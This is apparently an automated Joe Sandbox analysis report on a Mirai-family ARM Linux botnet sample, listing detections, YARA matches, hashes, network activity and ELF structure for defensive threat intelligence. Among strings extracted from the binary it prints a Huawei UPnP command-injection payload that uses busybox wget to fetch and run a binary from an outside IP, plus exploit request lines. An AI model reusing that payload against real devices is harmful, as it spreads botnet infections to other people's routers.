Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
5Yj6rO0YeI.elf

Overview

General Information

Sample name:5Yj6rO0YeI.elf
renamed because original name is a hash value
Original sample name:6f969e8bcb01c4c044a429fc186f3806.elf
Analysis ID:1436477
MD5:6f969e8bcb01c4c044a429fc186f3806
SHA1:b27c07dc693c1456e72a344d2142a6b0242c2d8b
SHA256:47ba79eda4f65afe0dd805f1fdadb254f318ed86e232931fcbd5fa54a785b795
Tags:32armelfmirai
Infos:

Detection

Mirai
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1436477
Start date and time:2024-05-05 12:44:10 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 26s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:5Yj6rO0YeI.elf
renamed because original name is a hash value
Original Sample Name:6f969e8bcb01c4c044a429fc186f3806.elf
Detection:MAL
Classification:mal80.troj.linELF@0/0@2/0

Runtime Messages

Command:/tmp/5Yj6rO0YeI.elf
PID:5429
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:

Process Tree

  • system is lnxubuntu20
  • 5Yj6rO0YeI.elf (PID: 5429, Parent: 5354, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/5Yj6rO0YeI.elf
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
5Yj6rO0YeI.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    5Yj6rO0YeI.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      5Yj6rO0YeI.elfLinux_Trojan_Mirai_0bce98a2unknownunknown
      • 0xff94:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
      5Yj6rO0YeI.elfMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
      • 0xff38:$x2: /dev/misc/watchdog
      • 0xff28:$x3: /dev/watchdog
      • 0xffa0:$s5: HWCLVGAJ

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      5435.1.00007f5e84017000.00007f5e84028000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        5435.1.00007f5e84017000.00007f5e84028000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
          5435.1.00007f5e84017000.00007f5e84028000.r-x.sdmpLinux_Trojan_Mirai_0bce98a2unknownunknown
          • 0xff94:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
          5435.1.00007f5e84017000.00007f5e84028000.r-x.sdmpMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
          • 0xff38:$x2: /dev/misc/watchdog
          • 0xff28:$x3: /dev/watchdog
          • 0xffa0:$s5: HWCLVGAJ
          5429.1.00007f5e84017000.00007f5e84028000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            Click to see the 5 entries

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 5Yj6rO0YeI.elfAvira: detected
            Multi AV Scanner detection for submitted file
            Source: 5Yj6rO0YeI.elfReversingLabs: Detection: 50%
            Source: 5Yj6rO0YeI.elfVirustotal: Detection: 43%Perma Link
            Source: 5Yj6rO0YeI.elfString: wgetcurlechobotdlr.mipsmpslx86armbinsboatnetskidsoraselfrepPOST /tmUnblock.cgi HTTP/1.1
            Source: /tmp/5Yj6rO0YeI.elf (PID: 5429)Socket: 192.168.2.13::8345Jump to behavior
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
            Source: 5Yj6rO0YeI.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: 5Yj6rO0YeI.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 5Yj6rO0YeI.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
            Source: 5Yj6rO0YeI.elf, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
            Source: 5435.1.00007f5e84017000.00007f5e84028000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
            Source: 5435.1.00007f5e84017000.00007f5e84028000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
            Source: 5429.1.00007f5e84017000.00007f5e84028000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
            Source: 5429.1.00007f5e84017000.00007f5e84028000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.146.234.130 -l /tmp/a -r /mips; /bin/busybox chmod 777 /tmp/a; /tmp/a selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.146.234.130 -l /tmp/a -r /mips; /bin/busybox chmod 777 /tmp/a; /tmp/a selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: 5Yj6rO0YeI.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
            Source: 5Yj6rO0YeI.elf, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
            Source: 5435.1.00007f5e84017000.00007f5e84028000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
            Source: 5435.1.00007f5e84017000.00007f5e84028000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
            Source: 5429.1.00007f5e84017000.00007f5e84028000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
            Source: 5429.1.00007f5e84017000.00007f5e84028000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
            Source: classification engineClassification label: mal80.troj.linELF@0/0@2/0
            Source: /tmp/5Yj6rO0YeI.elf (PID: 5429)Queries kernel information via 'uname': Jump to behavior
            Source: 5Yj6rO0YeI.elf, 5429.1.0000558457655000.0000558457783000.rw-.sdmp, 5Yj6rO0YeI.elf, 5435.1.0000558457655000.0000558457783000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
            Source: 5Yj6rO0YeI.elf, 5429.1.00007ffcb5a0c000.00007ffcb5a2d000.rw-.sdmp, 5Yj6rO0YeI.elf, 5435.1.00007ffcb5a0c000.00007ffcb5a2d000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/5Yj6rO0YeI.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/5Yj6rO0YeI.elf
            Source: 5Yj6rO0YeI.elf, 5429.1.0000558457655000.0000558457783000.rw-.sdmp, 5Yj6rO0YeI.elf, 5435.1.0000558457655000.0000558457783000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
            Source: 5Yj6rO0YeI.elf, 5429.1.00007ffcb5a0c000.00007ffcb5a2d000.rw-.sdmp, 5Yj6rO0YeI.elf, 5435.1.00007ffcb5a0c000.00007ffcb5a2d000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
            Source: 5Yj6rO0YeI.elf, 5435.1.00007ffcb5a0c000.00007ffcb5a2d000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

            Stealing of Sensitive Information

            barindex
            Yara detected Mirai
            Source: Yara matchFile source: 5Yj6rO0YeI.elf, type: SAMPLE
            Source: Yara matchFile source: 5435.1.00007f5e84017000.00007f5e84028000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5429.1.00007f5e84017000.00007f5e84028000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 5Yj6rO0YeI.elf PID: 5429, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 5Yj6rO0YeI.elf PID: 5435, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Mirai
            Source: Yara matchFile source: 5Yj6rO0YeI.elf, type: SAMPLE
            Source: Yara matchFile source: 5435.1.00007f5e84017000.00007f5e84028000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5429.1.00007f5e84017000.00007f5e84028000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 5Yj6rO0YeI.elf PID: 5429, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 5Yj6rO0YeI.elf PID: 5435, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid AccountsWindows Management Instrumentation1
            Scripting            		Path InterceptionDirect Volume AccessOS Credential Dumping11
            Security Software Discovery            		Remote ServicesData from Local System1
            Non-Application Layer Protocol            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
            Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service

            Malware Configuration

            No configs have been found

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            5Yj6rO0YeI.elf50%ReversingLabsLinux.Trojan.Mirai
            5Yj6rO0YeI.elf43%VirustotalBrowse
            5Yj6rO0YeI.elf100%AviraEXP/ELF.Gafgyt.X

            Dropped Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            daisy.ubuntu.com
            		162.213.35.25
            		truefalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/soap/encoding/5Yj6rO0YeI.elffalse
                		high
                http://schemas.xmlsoap.org/soap/envelope/5Yj6rO0YeI.elffalse
                  		high

                  World Map of Contacted IPs

                  No contacted IP infos

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  daisy.ubuntu.comgUTS4585C9.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.25
                  Z4wp78yHpp.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.24
                  LXtr28FcSb.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.24
                  X4D2VjX0iU.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.25
                  wQT6LP2bum.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.25
                  tORPHVoIES.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 162.213.35.24
                  h2wxkDURN7.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 162.213.35.25
                  8Tvactbet3.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 162.213.35.25
                  x9ZWbJkIqR.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 162.213.35.25
                  uIwwgtHZ80.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 162.213.35.25

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                  Entropy (8bit):6.071920857731026
                  TrID:
                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                  File name:5Yj6rO0YeI.elf
                  File size:68'096 bytes
                  MD5:6f969e8bcb01c4c044a429fc186f3806
                  SHA1:b27c07dc693c1456e72a344d2142a6b0242c2d8b
                  SHA256:47ba79eda4f65afe0dd805f1fdadb254f318ed86e232931fcbd5fa54a785b795
                  SHA512:ecf2daecffddb8b1ec0ad63bc2bc13dd36c74f572abfebf4b8671ae405f5b9d8b6a064bfe2c7957444b8346af642ba7badde63146051eb93ab7502fc1725608f
                  SSDEEP:1536:31indjqkQOTzQOBxoqaofq39TqNrZkuUkUCbjmFLd5NlBlE:lOdGROTzCqaGqNTSNtxjmFJ5Nl
                  TLSH:45631B49B8828A12C5D562B7FB6E02CD332553A8D2EF72039D216F2577CB82F0E37595
                  File Content Preview:.ELF...a..........(.........4...H.......4. ...(.....................<...<...............<...<...<.......((..........Q.td..................................-...L."...9>..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                  Static ELF Info

                  ELF header

                  Class:ELF32
                  Data:2's complement, little endian
                  Version:1 (current)
                  Machine:ARM
                  Version Number:0x1
                  Type:EXEC (Executable file)
                  OS/ABI:ARM - ABI
                  ABI Version:0
                  Entry Point Address:0x8190
                  Flags:0x202
                  ELF Header Size:52
                  Program Header Offset:52
                  Program Header Size:32
                  Number of Program Headers:3
                  Section Header Offset:67656
                  Section Header Size:40
                  Number of Section Headers:11
                  Header String Table Index:10

                  Sections

                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                  NULL0x00x00x00x00x0000
                  .initPROGBITS0x80940x940x180x00x6AX004
                  .textPROGBITS0x80b00xb00xf91c0x00x6AX0016
                  .finiPROGBITS0x179cc0xf9cc0x140x00x6AX004
                  .rodataPROGBITS0x179e00xf9e00xb5c0x00x2A004
                  .eh_framePROGBITS0x2053c0x1053c0x40x00x3WA004
                  .ctorsPROGBITS0x205400x105400x80x00x3WA004
                  .dtorsPROGBITS0x205480x105480x80x00x3WA004
                  .dataPROGBITS0x205540x105540x2ac0x00x3WA004
                  .bssNOBITS0x208000x108000x25640x00x3WA004
                  .shstrtabSTRTAB0x00x108000x480x00x0001

                  Program Segments

                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                  LOAD0x00x80000x80000x1053c0x1053c6.08980x5R E0x8000.init .text .fini .rodata
                  LOAD0x1053c0x2053c0x2053c0x2c40x28284.04650x6RW 0x8000.eh_frame .ctors .dtors .data .bss
                  GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                  Network Behavior

                  Network Port Distribution

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  May 5, 2024 12:44:54.744343042 CEST3499053192.168.2.131.1.1.1
                  May 5, 2024 12:44:54.744391918 CEST5033953192.168.2.131.1.1.1
                  May 5, 2024 12:44:54.836602926 CEST53503391.1.1.1192.168.2.13
                  May 5, 2024 12:44:54.851676941 CEST53349901.1.1.1192.168.2.13

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  May 5, 2024 12:44:54.744343042 CEST192.168.2.131.1.1.10xc1e5Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                  May 5, 2024 12:44:54.744391918 CEST192.168.2.131.1.1.10x6bc7Standard query (0)daisy.ubuntu.com28IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  May 5, 2024 12:44:54.851676941 CEST1.1.1.1192.168.2.130xc1e5No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                  May 5, 2024 12:44:54.851676941 CEST1.1.1.1192.168.2.130xc1e5No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                  System Behavior

                  General

                  Start time (UTC):10:44:46
                  Start date (UTC):05/05/2024
                  Path:/tmp/5Yj6rO0YeI.elf
                  Arguments:/tmp/5Yj6rO0YeI.elf
                  File size:4956856 bytes
                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                  Chronological Activities


                  General

                  Start time (UTC):10:44:52
                  Start date (UTC):05/05/2024
                  Path:/tmp/5Yj6rO0YeI.elf
                  Arguments:-
                  File size:4956856 bytes
                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                  Chronological Activities